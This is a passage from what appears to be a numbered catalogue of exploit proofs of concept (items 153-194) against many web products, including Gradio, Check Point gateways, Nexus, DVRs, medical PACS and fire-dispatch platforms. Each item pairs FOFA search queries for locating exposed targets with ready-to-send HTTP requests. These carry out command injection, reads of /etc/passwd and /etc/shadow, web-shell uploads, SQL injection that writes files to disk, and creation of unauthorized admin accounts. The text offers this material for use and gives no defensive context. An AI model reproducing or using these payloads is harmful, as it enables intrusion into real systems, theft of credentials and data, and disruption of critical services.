FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the returned file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 (INFINITT PACS) WebJobUpload Arbitrary File Upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 Directory Traversal and File Read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx Arbitrary File Upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field sets the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx Arbitrary File Upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php Arbitrary File Upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx Arbitrary File Upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
165. OrangeHRM 3.3.3 SQL Injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL Injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx Arbitrary File Read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode Arbitrary File Read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL Injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport Arbitrary File Read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL Injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 Arbitrary File Read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway Arbitrary File Read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx Arbitrary File Read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL Injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php File Upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C Router Sensitive Information Disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload Arbitrary File Upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 Arbitrary File Read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL Injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL Injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx Arbitrary User Creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib) updOpuserPw SQL Injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus Gateway AddUser Arbitrary User Addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (REALOR) SQL Injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL Injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment Arbitrary File Read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON) deleteStudy SQL Injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu Arbitrary File Read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL Injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr Arbitrary File Upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. Hillstone (山石网科) 云鉴 Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"

First obtain a CSRF token bound to an arbitrary PHPSESSID:

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Then submit the command with that token (replace {{token}}); the param value is evaluated as Python, and the example writes a marker file under the web root:

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Verify by fetching the marker file:

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"

If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present. The filename is not sanitised, so a traversal sequence writes the JSP into the deployed fe.war directory:

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
